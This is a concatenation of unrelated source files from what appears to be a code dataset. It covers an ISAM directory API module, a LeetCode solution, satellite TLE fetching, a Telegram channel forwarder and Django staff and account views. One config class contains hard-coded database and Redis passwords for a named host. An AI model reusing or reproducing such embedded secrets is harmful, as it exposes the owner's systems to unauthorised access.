    return isamAppliance.invoke_get("Retrieving the details for a particular federated directory",
                                    "/isam/runtime_components/federated_directories/{0}/v1".format(id))
def set(isamAppliance, id, hostname, port, bind_dn, bind_pwd, suffix, use_ssl=False, client_cert_label=None,
        ignore_if_down=False,
        check_mode=False, force=False):
    """
    Idempotent create-or-update: adds the federated directory when
    *id* is unknown, otherwise updates it in place.
    (Note: this function intentionally shadows the builtin `set` to
    match the module's Ansible-style API.)
    """
    if _exists(isamAppliance, id) is False:
        # directory absent -- force the add (existence already checked)
        return add(isamAppliance, id=id, hostname=hostname, port=port, bind_dn=bind_dn, bind_pwd=bind_pwd,
                   suffix=suffix, use_ssl=use_ssl, client_cert_label=client_cert_label,
                   ignore_if_down=ignore_if_down,
                   check_mode=check_mode,
                   force=True)
    else:
        return update(isamAppliance, id=id, hostname=hostname, port=port, bind_dn=bind_dn, bind_pwd=bind_pwd,
                      suffix=suffix, use_ssl=use_ssl, client_cert_label=client_cert_label,
                      ignore_if_down=ignore_if_down,
                      check_mode=check_mode,
                      force=force)
def add(isamAppliance, id, hostname, port, bind_dn, bind_pwd, suffix, use_ssl=False, client_cert_label=None,
ignore_if_down=False,
check_mode=False, force=False):
"""
Create a new federated directory
"""
if (isinstance(suffix, basestring)):
import ast
suffix = ast.literal_eval(suffix)
if force is True or _exists(isamAppliance, id) is False:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
json_data = {
'id': id,
'hostname': hostname,
'port': port,
'bind_dn': bind_dn,
'bind_pwd': bind_pwd,
'use_ssl': use_ssl,
'suffix': suffix
}
if ignore_if_down and tools.version_compare(isamAppliance.facts["version"], "10.0.4") >= 0:
json_data['ignore_if_down'] = ignore_if_down
# Do not pass if there is no value - call fails otherwise
if client_cert_label is not None:
json_data['client_cert_label'] = client_cert_label
return isamAppliance.invoke_post(
"Create a new federated directory",
"/isam/runtime_components/federated_directories/v1", json_data)
return isamAppliance.create_return_object()
def update(isamAppliance, id, hostname, port, bind_dn, bind_pwd, suffix, use_ssl=False, client_cert_label=None,
ignore_if_down=False,
check_mode=False, force=False):
"""
Update an existing federated directory
"""
if force is True or (
_exists(isamAppliance, id) and _check(isamAppliance, id, hostname, port, bind_dn, bind_pwd,
use_ssl, client_cert_label, suffix, ignore_if_down) is False):
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
json_data = {
'hostname': hostname,
'port': port,
'bind_dn': bind_dn,
'bind_pwd': bind_pwd,
'use_ssl': use_ssl,
'suffix': suffix
}
if ignore_if_down and tools.version_compare(isamAppliance.facts["version"], "10.0.4") >= 0:
json_data['ignore_if_down'] = ignore_if_down
# Do not pass if there is no value - call fails otherwise
if client_cert_label is not None:
json_data['client_cert_label'] = client_cert_label
return isamAppliance.invoke_put(
"Update an existing federated directory",
"/isam/runtime_components/federated_directories/{0}/v1".format(id), json_data)
return isamAppliance.create_return_object()
def delete(isamAppliance, id, check_mode=False, force=False):
    """
    Remove an existing federated directory
    """
    # only issue the DELETE when the directory exists (or force is set)
    if force is True or _exists(isamAppliance, id) is True:
        if check_mode is True:
            # dry run: report that a change would have been made
            return isamAppliance.create_return_object(changed=True)
        else:
            return isamAppliance.invoke_delete(
                "Remove an existing federated directory",
                "/isam/runtime_components/federated_directories/{0}/v1".format(id))
    return isamAppliance.create_return_object()
def _exists(isamAppliance, id):
    """
    Check if federated directory exists
    :param isamAppliance: appliance connection object
    :param id: federated directory identifier
    :return: True when a directory with this id is configured
    """
    ret_obj = get_all(isamAppliance)
    return any(entry['id'] == id for entry in ret_obj['data'])
def _check(isamAppliance, id, hostname, port, bind_dn, bind_pwd, use_ssl, client_cert_label, suffix, ignore_if_down=False):
"""
Check if parameters match given federated directory
Note: This does not check bind_pwd
Returns True if it exists and is the same
"""
if _exists(isamAppliance, id):
ret_obj = get(isamAppliance, id)
else:
return False
set_value = {
'id': id,
'hostname': hostname,
'port': str(port),
'bind_dn': bind_dn,
'use_ssl': use_ssl,
'suffix': suffix
}
if use_ssl is True:
set_value['client_cert_label'] = client_cert_label
if ignore_if_down and tools.version_compare(isamAppliance.facts["version"], "10.0.4") >= 0:
set_value['ignore_if_down'] = ignore_if_down
newEntriesJSON = json.dumps(set_value, skipkeys=True, sort_keys=True)
logger.debug("\nSorted New Federated Directory {0}: {1}".format(id, newEntriesJSON))
currentEntriesJSON = json.dumps(ret_obj['data'], skipkeys=True, sort_keys=True)
logger.debug("\nSorted Existing Federated Directory {0}: {1}".format(id, currentEntriesJSON))
if newEntriesJSON == currentEntriesJSON:
return True
else:
return False
def compare(isamAppliance1, isamAppliance2):
    """
    Compare federated directory stanze entries between two appliances
    """
    ret_obj1 = get_all(isamAppliance1)
    ret_obj2 = get_all(isamAppliance2)
    # no volatile keys to exclude, hence the empty deleted_keys list
    return tools.json_compare(ret_obj1, ret_obj2, deleted_keys=[])
|
19,771 | 8ddfe37ac8db6441389a602c527f607790592468 | # class Solution:
# def findDuplicate(self, nums: List[int]) -> int:
#
# tortoise = nums[0]
# hare = nums[0]
#
# while True:
#
# tortoise = nums[tortoise]
# hare = nums[hare]
# hare = nums[hare]
#
# if tortoise == hare:
# break
#
# hare = nums[0]
#
# while hare != tortoise:
# hare = nums[hare]
# tortoise = nums[tortoise]
#
# return hare
class Solution:
    """LeetCode 287 -- Find the Duplicate Number.

    Repeatedly moves nums[0] into its value-indexed slot; the walk
    terminates when a value already occupies its own slot, which can
    only happen for the duplicated value.  NOTE: mutates *nums*.
    """

    def findDuplicate(self, nums: list[int]) -> int:
        # BUG FIX: the original annotation used typing.List without
        # importing it, raising NameError at class-definition time;
        # the builtin generic list[int] (3.9+) needs no import.
        while True:
            temp = nums[0]
            if nums[temp] == temp:
                return temp
            nums[0] = nums[temp]
            nums[temp] = temp
|
19,772 | daa7a2ff7b9c082ce870b9a0665fe1c3a17f1fa1 | '''
Created on Jul 16, 2013
@author: Maksim Roienko
@company: BinTime
'''
from src.ProductPage import ProductPage
class MainPage(object):
    '''
    Class MainPage describes home page of fututrumshop.nl
    (Page Object pattern for Selenium tests.)
    '''

    def __init__(self, driver):
        # driver: the shared selenium WebDriver instance
        self.driver = driver

    def search(self, param1):
        """Type *param1* into the search box, submit the search, and
        return the resulting ProductPage page object."""
        self.driver.find_element_by_id("fc_search").send_keys(param1)
        self.driver.find_element_by_id("searchBarButton").click()
        return ProductPage(self.driver)
|
19,773 | 484e665489a3b40d104796e60baa2e2ac527d52f | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib import admin
from .models import Corpus
from .models import File
from .models import Phrase
from .models import Project
from .models import Process
from .models import Report
from .models import Translation
##admin.site.register(Project, ProjectAdmin)
admin.site.register(Corpus)
admin.site.register(File)
admin.site.register(Phrase)
admin.site.register(Process)
admin.site.register(Project)
admin.site.register(Report)
admin.site.register(Translation)
#admin.site.register(Report)
|
19,774 | fd43afd15193b6f162dbd37dda8f90768c1da344 | import urllib.request
from skyfield.api import EarthSatellite
from settings import TLE_SETTINGS
from utils import chunker
TLEs = []
TLEs_byID = {}
satellites = []
satellites_byID = {}
def prep_data():
    """Build EarthSatellite objects from the raw TLE records, stamp
    each record with its epoch, and rebuild the id-keyed lookup
    tables."""
    global TLEs_byID
    global satellites
    global satellites_byID
    # BUG FIX: the original appended to the module-level `satellites`
    # list without clearing it, so every TLE refresh accumulated
    # stale duplicate satellites; rebuild the list instead.
    new_satellites = []
    for tle in TLEs:
        satellite = EarthSatellite(tle['line1'], tle['line2'], tle['name'])
        new_satellites.append(satellite)
        # remember the TLE epoch as an ISO-8601 string for output
        tle['epoch'] = str(satellite.epoch.utc_iso())
    satellites = new_satellites
    TLEs_byID = {sat['id']: sat for sat in TLEs}
    satellites_byID = {sat.model.satnum: sat for sat in satellites}
def update_TLEs():
    """Download the TLE file configured in TLE_SETTINGS, parse it into
    3-line records (name / line1 / line2), replace the module-level
    TLEs list, and rebuild the derived satellite tables via
    prep_data()."""
    global TLEs
    url = TLE_SETTINGS['url']
    req = urllib.request.Request(url, method='GET')
    retrieved_lines = []
    with urllib.request.urlopen(req) as f:
        if f.status == 200:
            # normalize CRLF line endings and surrounding whitespace
            retrieved_lines = [line.decode().replace('\r\n', '').strip()
                               for line in list(f.readlines())]
        else:
            raise Exception("Error downloading TLE file")
    new_TLEs = []
    # TLE files are triplets: a title line followed by the two element
    # lines; the NORAD catalog number is the second field of line 2
    for group in chunker(retrieved_lines, 3):
        sat = {
            'name': group[0],
            'id': int(group[2].split()[1]),
            'line1': group[1],
            'line2': group[2]
        }
        new_TLEs.append(sat)
    TLEs = new_TLEs
    prep_data()
update_TLEs() |
19,775 | b2f699eafce1439cbc9b3cfd8f7634933cc498e3 | from flask_migrate import Migrate
from flask_restful import Api
import config
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__, template_folder='templates')
app.config.from_object(config.Config)
db = SQLAlchemy(app)
migrate = Migrate(app, db)
api = Api(app)
from . import models
from src import routes
|
19,776 | b5204ceb072b163ec1b04827d08c3ec83a9b0a5e | import threading
import ConfigParser
cfg = {}
cp = ConfigParser.ConfigParser()
cp.read('/home/ente/src/ente.cfg')
for section in cp.sections():
sec_cfg = dict([(key.lower(), value) for key, value in cp.items(section)])
cfg[section.lower()] = sec_cfg
def get_section(s):
    # Return the option dict for config section *s* (case-insensitive);
    # raises KeyError for unknown sections.
    return cfg[s.lower()]
def get_entry(e, default=None):
    # Look up a dotted "section.key" entry (case-insensitive);
    # returns *default* when the section or key is missing.
    # NOTE(review): an *e* without a '.' raises ValueError on the
    # unpack below -- confirm callers always pass dotted names.
    section, key = e.lower().split(".", 1)
    return cfg.get(section, {}).get(key, default)
def add_change_hook(f):
    # Stub: config-change notifications are not implemented; *f* is
    # accepted and ignored so callers need no special-casing.
    pass
from __main__ import global_stuff, bootstrap_thread
global_stuff.config_funcs = [get_section, get_entry, add_change_hook]
import ente_init
ente_init.init_io_redirect("utf-8")
# ente processes don't provide sys.argv, thats why we fake it here
import sys
sys.argv = ["run.py"]
import tasks.tasks
reload(tasks.tasks)
def main_thread():
tasks.tasks.app.worker_main()
def start_main_thread(*a, **kw):
threading.Thread(target=lambda: bootstrap_thread(main_thread)).start()
# do not join, ente needs this function to return
ente_init.set_bgthread_hook(start_main_thread)
|
19,777 | 34e9b3daa9a417920429bbee3722c7529f45e233 | import pickle
# Read back the pickled dataset: the first object in the file is the
# record count, followed by that many pickled records.
# BUG FIX: the file handle is now closed via a context manager even
# when pickle.load raises (the original leaked it on error).
with open('sample_pickle.dat', 'rb') as f:
    n = pickle.load(f)  # number of records stored in the file
    for i in range(n):
        x = pickle.load(f)
        print(x)
|
19,778 | 0e416140d5133217aebe4cf12544f4cd2783f6b6 | from time import sleep
# Count down from 10 to 0, printing one number per second in blue.
for i in range(10,-1,-1):
    print(f"\033[0;34m{i}\033[m")
    sleep(1)
# NOTE(review): the trailing escape repeats the yellow colour code
# instead of resetting (\033[m), leaving the terminal yellow --
# confirm whether that is intended.
print('\033[0;33mBOOM!!!\033[0;33m')
19,779 | bd0775290b629d65fdcdf968ccf868d8bbf72f08 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy
import random
from pysc2.lib import actions
from s2clientprotocol import sc2api_pb2 as sc_pb
import tstarbot as ts
UNIT_TYPE_HATCHERY = 86
UNIT_TYPE_DRONE= 104
class DemoPool(ts.PoolBase):
    """Caches hatchery positions and drone tags from each observation.

    update() is expected once per frame; the getters then expose the state
    extracted from that frame.
    """

    def __init__(self):
        self._drone_ids = []
        self._hatcherys = []

    def update(self, obs):
        """Refresh the cached hatchery positions and drone tags from obs['units']."""
        units = obs['units']
        self._locate_hatcherys(units)
        self._update_drone(units)

    def _locate_hatcherys(self, units):
        # Fixed: the old version appended without clearing, so positions
        # accumulated duplicates (and grew unboundedly) on every update().
        # Rebuild the list each frame, mirroring _update_drone.
        hatcherys = []
        for u in units:
            if u.unit_type == UNIT_TYPE_HATCHERY:
                hatcherys.append((u.float_attr.pos_x, u.float_attr.pos_y, u.float_attr.pos_z))
        self._hatcherys = hatcherys

    def _update_drone(self, units):
        drone_ids = []
        for u in units:
            if u.unit_type == UNIT_TYPE_DRONE:
                drone_ids.append(u.tag)
        self._drone_ids = drone_ids

    def get_drones(self):
        """Return the drone tags seen in the latest update()."""
        return self._drone_ids

    def get_hatcherys(self):
        """Return (x, y, z) tuples for hatcheries seen in the latest update()."""
        return self._hatcherys
class DemoManager(ts.ManagerBase):
    """Issues one random short-range move order per drone around the first hatchery."""

    def __init__(self, pool):
        self._pool = pool
        self._range_high = 5    # max random offset from the hatchery position
        self._range_low = -5    # min random offset
        self._move_ability = 1  # ability id sent with the command (presumably Move — confirm)

    def execute(self):
        """Build and return this frame's list of raw actions."""
        drone_ids = self._pool.get_drones()
        pos = self._pool.get_hatcherys()
        print('pos=', pos)
        return self.move_drone_random_round_hatchery(drone_ids, pos[0])

    def move_drone_random_round_hatchery(self, drone_ids, pos):
        """Return raw SC2 actions moving each drone to a random point near *pos*.

        Fixed: the local result list was named `actions`, shadowing the module
        imported at file level; the unused `length` local was dropped.
        """
        move_actions = []
        for drone in drone_ids:
            action = sc_pb.Action()
            action.action_raw.unit_command.ability_id = self._move_ability
            x = pos[0] + random.randint(self._range_low, self._range_high)
            y = pos[1] + random.randint(self._range_low, self._range_high)
            action.action_raw.unit_command.target_world_space_pos.x = x
            action.action_raw.unit_command.target_world_space_pos.y = y
            action.action_raw.unit_command.unit_tags.append(drone)
            move_actions.append(action)
        return move_actions
class DemoBot:
    """A random agent for starcraft."""
    def __init__(self, env):
        self._pools = []      # DemoPool instances, refreshed each frame
        self._managers = []   # DemoManager instances, queried for actions
        self._env = env
    def setup(self):
        # Wire one pool/manager pair plus the raw-action executor.
        # NOTE(review): _executor is only created here, not in __init__, so
        # calling run() before setup() raises AttributeError.
        demo_pool = DemoPool()
        demo_manager = DemoManager(demo_pool)
        self._pools.append(demo_pool)
        self._managers.append(demo_manager)
        self._executor = ts.ActExecutor(self._env)
    def reset(self):
        # Restart the episode and return the environment's initial timesteps.
        timesteps = self._env.reset()
        return timesteps
    def run(self, n):
        # Play a single episode for at most *n* steps (or until it ends).
        return self._run_inner(n)
    def _run_inner(self, n):
        try:
            """episode loop """
            step_num = 0
            timesteps = self.reset()
            while True:
                # Each manager sees the pools' state for the current frame.
                obs = timesteps[0].observation
                for pool in self._pools:
                    pool.update(obs)
                actions = []
                for manager in self._managers:
                    part_actions = manager.execute()
                    actions.extend(part_actions)
                result = self._executor.exec_raw(actions)
                # result[1] presumably flags episode termination — confirm
                # against ActExecutor; result[0] carries the next timesteps.
                if result[1]:
                    break
                timesteps = result[0]
                if step_num > n:
                    break
                step_num += 1
        except KeyboardInterrupt:
            print("SC2Imp exception")
|
19,780 | b4ff303780e3a1004fc5c8977a691776725357dd | from telethon import TelegramClient, events
from telethon.sessions import StringSession
from telethon.tl.functions.channels import GetMessagesRequest
import logging
import redis
from text_parser import emanuelefilter, transform_text
from datetime import datetime
from config import api_hash, api_id, channel_input, channel_output, session, REDISTOGO_URL
# Log only warnings and above.
logging.basicConfig(format='[%(levelname) 5s/%(asctime)s] %(name)s: %(message)s',
                    level=logging.WARNING)
# Redis stores "<chat>-<source message id>" -> forwarded message id, used by
# the forwarder below to re-link reply chains in the output channels.
r = redis.from_url(url=REDISTOGO_URL)
client = TelegramClient(StringSession(session), api_id, api_hash)
@client.on(
    events.NewMessage(
        chats= channel_input,
        incoming=True,
        outgoing=True
    ))
async def forwarder(event):
    """Mirror a new message from the input channel into every output channel.

    Reply threading is preserved via redis: each forwarded message id is
    stored under "<chat>-<source id>" so later replies can be re-linked.
    Fixed: three bare `except:` clauses were narrowed so they no longer
    swallow SystemExit/KeyboardInterrupt; the media lookup catches only the
    AttributeError raised when the message has no file.
    """
    text = event.message.text
    message_id = event.message.id
    reply_msg = event.message.reply_to_msg_id
    valid = emanuelefilter(text)
    text = transform_text(text)
    count = 0
    for cht in channel_output:
        # Best-effort reply re-link: missing key / redis outage -> no reply ref.
        try:
            ref = int(r.get(f"{cht}-{reply_msg}").decode('utf-8'))
        except Exception:
            print('Out of scope or bounds for redis')
            ref = None
        # A text-only message has file == None, raising AttributeError here.
        try:
            msg_file = event.message.file.media
            ext = event.message.file.ext
        except AttributeError:
            msg_file = None
            ext = None
        count += 1
        print(cht, count)
        if valid:
            try:
                output_channel = await client.send_message(cht, text, file=msg_file, reply_to=ref)
                r.set(f"{cht}-{event.message.id}", output_channel.id)
                print(f"\u001b[32mSENT......{text}....SENT\u001b[37m....")
            except Exception:
                print(f"\u001b[31mNot Sent an error occurred {text[:70]} ...Not Sent\u001b[37m...")
        else:
            print(f"\u001b[31mNot Sent invalid {text[:70]} ...Not Sent\u001b[37m...")
@client.on(events.NewMessage)
async def wakeup(event):
    # Minimal catch-all handler: prints a tick for every incoming message.
    print('..')
# Connect with the saved string session, then block dispatching events
# until the connection drops.
client.start()
client.run_until_disconnected()
|
class Subject:
    """Minimal observable: keeps a list of observers and pushes itself to them."""

    def __init__(self):
        self.observers = []

    def add_observer(self, observer):
        """Register *observer*; it must expose update(subject)."""
        self.observers.append(observer)

    def remove_observer(self, observer):
        """Unregister a previously added observer (ValueError if absent)."""
        self.observers.remove(observer)

    def send_notification(self):
        """Invoke update(self) on every registered observer, in add order."""
        for subscriber in self.observers:
            subscriber.update(self)
class CricketScore(Subject):
    """Observable cricket score: notifies observers whenever runs or wickets change."""

    def __init__(self):
        super(CricketScore, self).__init__()
        # Fixed: a redundant `self.observers = []` re-assignment was removed —
        # Subject.__init__ already creates the list.
        self.__runs = 0
        self.__wickets = 0

    @property
    def runs(self):
        return self.__runs

    @runs.setter
    def runs(self, value):
        # Setting runs pushes a notification to all observers.
        self.__runs = value
        self.send_notification()

    @property
    def wickets(self):
        return self.__wickets

    @wickets.setter
    def wickets(self, value):
        # Setting wickets pushes a notification to all observers.
        self.__wickets = value
        self.send_notification()
|
19,782 | 439a9e415703f8c556679ccddcab44589c34d385 | import os
# Current working directory; NOTE(review): `path` is unused in this chunk.
path = os.getcwd()
class DevelopingConfig:
    # Flask-style development settings.
    # SECURITY: database and redis credentials are hard-coded in source —
    # move them to environment variables or a secrets store.
    DEBUG = False
    SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://designer:sEPL7PHYNk6DGpa2@wghtstudio.cn:3306/designer?charset=UTF8MB4'
    SQLALCHEMY_TRACK_MODIFICATIONS = False
    REDIS = {
        'password': 'gyk199941',
        'host': 'wghtstudio.cn',
        'port': 6379
    }
class ProductionConfig:
    # Production settings.
    # NOTE(review): no DB/redis settings here — confirm they are supplied elsewhere.
    DEBUG = False
|
19,783 | 2813c81c856032838877bbc47a528c89e617f1bb | from pathlib import Path
from typing import Any, Optional, Union
from pydantic import Field
from qgreenland.models.base_model import QgrBaseModel
from qgreenland.models.config.dataset import AnyAsset, Dataset
from qgreenland.models.config.step import AnyStep
from qgreenland.util.layer_style import get_style_filepath
from qgreenland.util.model_validators import reusable_validator, validate_paragraph_text
from qgreenland.util.model_validators.layer_style import (
validate_style_file_continuous_legend,
validate_style_file_exists,
validate_style_file_only_contains_allowed_fonts,
)
class LayerInput(QgrBaseModel):
    """The input(s) to a layer's processing pipeline."""
    # TODO: just maintain ids here?
    # (The bare strings after each field are field docstrings — presumably
    # consumed by documentation tooling, not at runtime; confirm.)
    dataset: Dataset
    """The dataset providing the layer's input. Important for metadata."""
    asset: AnyAsset
    """The actual input asset (file or files)."""
class Layer(QgrBaseModel):
    """Configuration for a single QGreenland layer (fields, style, pipeline steps)."""
    id: str
    """Unique identifier."""
    title: str
    """The layer name in QGIS Layers Panel."""
    description: str = Field(..., min_length=1)
    """Descriptive text shown as hover-text in the QGIS Layer Panel."""
    tags: list[str] = []
    """Additional categories that describe this data."""
    in_package: bool = True
    """Is this layer in the final QGreenland zip file?"""
    show: bool = False
    """Is this layer initially "checked" or visible in QGIS?"""
    style: Optional[str] = Field(None, min_length=1)
    """Which style (.qml) file to use for this layer?
    Omit the file extension.
    """
    input: LayerInput
    steps: Optional[list[AnyStep]]
    # Shared validators from qgreenland.util.model_validators, bound to
    # individual fields; the three style validators all run against `style`.
    _validate_description = reusable_validator("description", validate_paragraph_text)
    _validate_style_file_exists = reusable_validator(
        "style",
        validate_style_file_exists,
    )
    _validate_style_file_only_contains_allowed_fonts = reusable_validator(
        "style",
        validate_style_file_only_contains_allowed_fonts,
    )
    _validate_style_file_continuous_legend = reusable_validator(
        "style",
        validate_style_file_continuous_legend,
    )
    @property
    def style_filepath(self) -> Union[Path, None]:
        """Full filepath to the QML style file."""
        if self.style is None:
            return None
        return get_style_filepath(self.style)
    def __json__(self) -> dict[Any, Any]:
        """Limit child models that are output when dumping JSON.
        When dumping a layer tree, we shouldn't include all the datasets and the
        assets because that results in severe duplication.
        """
        # Keep every top-level field except `input`, which is reduced to the
        # dataset/asset ids; step ids are stripped via `exclude`.
        return self.dict(
            include={
                **{k: ... for k in self.dict().keys() if k != "input"},
                "input": {
                    "dataset": {"id"},
                    "asset": {"id"},
                },
            },
            exclude={
                "steps": {"__all__": {"id"}},
            },
        )
|
from django.shortcuts import render, redirect, HttpResponseRedirect
from accounts.forms import RegistrationForm, EditProfileForm
from django.contrib.auth.forms import PasswordChangeForm
from django.contrib.auth import update_session_auth_hash
from django.shortcuts import HttpResponseRedirect
from django.shortcuts import get_object_or_404
from .models import User
from django.views.generic import View
from canonapp.models import *
from django.utils import timezone
from datetime import datetime,timezone
from datetime import datetime as dt
from django.db.models.functions import Length, Upper, datetime
from django.http import HttpResponse
from django.views.generic import ListView, DetailView
from django.views.generic.edit import CreateView, UpdateView, DeleteView
from django.urls import reverse_lazy
from django import forms
from accounts.models import Staff
from django.contrib.auth.decorators import login_required
from django.shortcuts import render, redirect,get_object_or_404
from .models import *
from .forms import *
from datetime import datetime as dt
from datetime import datetime,timezone
from twilio.rest import Client
from twilio.base.exceptions import TwilioRestException
from django.db.models import Count, F, Value,Sum
from django.db.models.functions import Length, Upper, datetime
from django.http import HttpResponse
from django.views.generic import View
from django.utils import timezone
from .pdf_render import Render
from django.http import JsonResponse
from django.shortcuts import render, get_object_or_404
from django.db.models import Q
from .forms import *
from django.shortcuts import redirect, HttpResponseRedirect
from django.http import JsonResponse
from django.shortcuts import render, get_object_or_404, redirect
from django.db.models import Q
from django.shortcuts import render, redirect, get_object_or_404
from django.forms import ModelForm
from accounts.models import Staff
# NOTE(review): the duplicated imports above are kept in their original order
# on purpose — later lines rebind `datetime`/`timezone`, and reordering would
# change which binding the views below see.
from django.utils.decorators import method_decorator
# Create your views here.
@login_required
def home(request):
    """Render the manager landing page."""
    return render(request, 'accounts/home.html')
@login_required
def executive_home(request):
    """Render the executive landing page."""
    return render(request, 'accounts/executive_home.html')
@login_required
def view_profile(request):
    """Show the logged-in user's profile."""
    return render(request, 'accounts/view_profile.html', {'user': request.user})
@login_required
def edit_profile(request):
    """Edit the logged-in user's profile; invalid POSTs re-render with errors."""
    if request.method == 'POST':
        form = EditProfileForm(request.POST, instance=request.user)
        if form.is_valid():
            form.save()
            return redirect('/account/view_profile')
    else:
        form = EditProfileForm(instance=request.user)
    return render(request, 'accounts/edit_profile.html', {'form': form})
@login_required
def change_password(request):
    """Change the current user's password without logging them out."""
    if request.method != 'POST':
        form = PasswordChangeForm(user=request.user)
        return render(request, 'accounts/change_password.html', {'form': form})
    form = PasswordChangeForm(data=request.POST, user=request.user)
    if not form.is_valid():
        return redirect('/account/change_password')
    form.save()
    # Rotate the session auth hash so the password change keeps the session valid.
    update_session_auth_hash(request, form.user)
    return redirect('/account/view_profile')
def login_success(request):
    """Route a freshly logged-in user to the landing page for their group."""
    group_pages = (
        ('Manager', 'accounts/home.html'),
        ('Executive', 'accounts/executive_home.html'),
        ('Accountant', 'accountantapp/Accprofile.html'),
        ('Operations', 'operationsapp/operations_home.html'),
        ('Receptionist', 'receptionistapp/receptionist_home.html'),
    )
    for group_name, template in group_pages:
        if request.user.groups.filter(name=group_name):
            return render(request, template)
    # NOTE(review): this "redirects" to a literal relative URL, not an error page.
    return HttpResponseRedirect('Account not found')
@login_required
def executive_driver_payment_archive(request):
    """Executive view: search archived monthly driver-payment reports.

    GET renders the empty search form; POST filters the archive by the
    submitted month/year and shows the matching records plus totals.
    Fixed: the month list repeated 'August' and 'November', producing
    duplicate dropdown entries.
    """
    months = ['January', 'February', 'March', 'April', 'May', 'June', 'July',
              'August', 'September', 'October', 'November', 'December']
    years = [2019, 2020, 2021, 2022, 2023, 2024, 2025, 2026, 2027, 2028, 2029,
             2030, 2031, 2032, 2033, 2034, 2035]
    drivers = Driver.objects.all()
    if request.method == 'POST':
        report_year = request.POST['report_year']
        report_month = request.POST['report_month']
        archived_reports = Driver_payment_Reports_Archive.objects.filter(
            month=report_month, year=report_year)
        today = timezone.now()
        item_number = archived_reports.count()
        driver_total_balance = archived_reports.aggregate(
            total_bal=models.Sum("balance"))["total_bal"]
        driver_total_paid = archived_reports.aggregate(
            total_pai=models.Sum("amount_paid"))["total_pai"]
        context = {'archived_reports': archived_reports, 'months': months,
                   'years': years, 'drivers': drivers,
                   'driver_total_paid': driver_total_paid,
                   'driver_total_balance': driver_total_balance,
                   'item_number': item_number, 'today': today,
                   'report_year': report_year, 'report_month': report_month}
        return render(request, "accounts/executive_driver_payment_archive.html", context)
    context = {'months': months, 'years': years, 'drivers': drivers}
    return render(request, "accounts/executive_driver_payment_archive.html", context)
########################################################
# printing archived monthly reports
########################################################
class executive_driver_payment_archive_print(View):
    """PDF rendering of one archived month's driver-payment report."""

    def get(self, request, report_month, report_year):
        archived_reports = Driver_payment_Reports_Archive.objects.filter(
            month=report_month, year=report_year)
        balance_totals = archived_reports.aggregate(total_bal=models.Sum("balance"))
        paid_totals = archived_reports.aggregate(total_pai=models.Sum("amount_paid"))
        context = {
            'archived_reports': archived_reports,
            'drivers': Driver.objects.all(),
            'driver_total_paid': paid_totals["total_pai"],
            'driver_total_balance': balance_totals["total_bal"],
            'item_number': archived_reports.count(),
            'today': timezone.now(),
            'report_year': report_year,
            'report_month': report_month,
        }
        return Render.render('accounts/executive_driver_payment_archive_print.html', context)
#################################################################
#Staff Views
################################################################
#######create staff
@login_required
def staff_create(request):
    """Create a Staff record; on invalid POST, re-render the bound form."""
    if request.method != "POST":
        return render(request, 'accounts/staff_create.html', {'form': StaffForm()})
    form = StaffForm(request.POST, request.FILES)
    if form.is_valid():
        form.save()
        return redirect('staff_view')
    return render(request, 'accounts/staff_create.html', {'form': form})
#################View Staff
@login_required
def staff_view(request):
    """List all staff members."""
    return render(request, "accounts/view_staff.html", {'items': Staff.objects.all()})
###########edit staff
@login_required
def staff_update(request, pk):
    """Edit an existing Staff record (404 when missing)."""
    item = get_object_or_404(Staff, pk=pk)
    if request.method != "POST":
        form = StaffForm(instance=item)
        return render(request, 'accounts/staff_update.html', {'form': form})
    form = StaffForm(request.POST, request.FILES, instance=item)
    if form.is_valid():
        form.save()
        return redirect('staff_view')
    return render(request, 'accounts/staff_update.html', {'form': form})
###############delete staff
@login_required
def staff_delete(request, pk):
    """Delete a staff record and re-render the staff list.

    NOTE(review): this deletes on a plain GET with no confirmation —
    consider requiring POST (CSRF-protected).
    """
    Staff.objects.filter(id=pk).delete()
    return render(request, 'accounts/view_staff.html', {'items': Staff.objects.all()})
#################################################################
#Users Views
################################################################
#######create user
@login_required
def register(request):
    """Create a new user account; invalid POSTs re-render with errors."""
    if request.method != 'POST':
        return render(request, 'accounts/reg_form.html', {'form': RegistrationForm()})
    form = RegistrationForm(request.POST)
    if form.is_valid():
        form.save()
        return redirect('users_view')
    return render(request, 'accounts/reg_form.html', {'form': form})
#################View users
@login_required
def users_view(request):
    """List all user accounts."""
    return render(request, "accounts/users_view.html", {'items': User.objects.all()})
###########edit users
@login_required
def users_edit(request, pk):
    """Edit an existing user account (404 when missing)."""
    item = get_object_or_404(User, pk=pk)
    if request.method != "POST":
        form = RegistrationForm(instance=item)
        return render(request, 'accounts/users_edit.html', {'form': form})
    form = RegistrationForm(request.POST, request.FILES, instance=item)
    if form.is_valid():
        form.save()
        return redirect('users_view')
    return render(request, 'accounts/users_edit.html', {'form': form})
###############delete users
@login_required
def users_delete(request, pk):
    """Delete a user account and re-render the users list.

    NOTE(review): delete-on-GET with no confirmation — consider POST + CSRF.
    """
    User.objects.filter(id=pk).delete()
    return render(request, 'accounts/users_view.html', {'items': User.objects.all()})
################################################################################
#########################################
# display_driver_financial statement
##########################################
######################################################
# accountant generate driver financial report
##############################################################
class accountant_generate_driver_financial_report(View):
    """Render a single driver's financial statement (payments + totals) as a PDF."""

    # Fixed: @login_required was applied directly to the method, so the View
    # instance (`self`) reached the auth wrapper as `request`.  method_decorator
    # adapts function decorators for class-based views (requires the
    # django.utils.decorators import added at the top of the file).
    @method_decorator(login_required)
    def get(self, request, driver_name):
        # Fixed: the driver row was fetched three times via get_object_or_404;
        # fetch once and read the attributes off the single object.
        driver_obj = get_object_or_404(Driver, driver_name=driver_name)
        attached_car = driver_obj.attached_car
        # Outstanding balance still owed by the driver.
        driver_balance = driver_obj.driver_monthly_payment
        # All payments made by this driver (FK stored as the driver id).
        payments = DriverPayment.objects.filter(driver_name=driver_obj.id)
        today = timezone.now()
        total = payments.aggregate(total_amount_paid=models.Sum("paid_amount"))
        total_paid = total["total_amount_paid"]
        params = {
            'attached_car': attached_car,
            'total_paid': total_paid,
            'driver_balance': driver_balance,
            'driver_name': driver_name,
            'request': request,
            'payments': payments,
            'today': today,
        }
        return Render.render('accounts/accountant_driver_financial_report.html', params)
######################################
# Searching for archived report
#############################################
@login_required
def accountant_driver_payment_archive(request):
    """Accountant view: search archived monthly driver-payment reports.

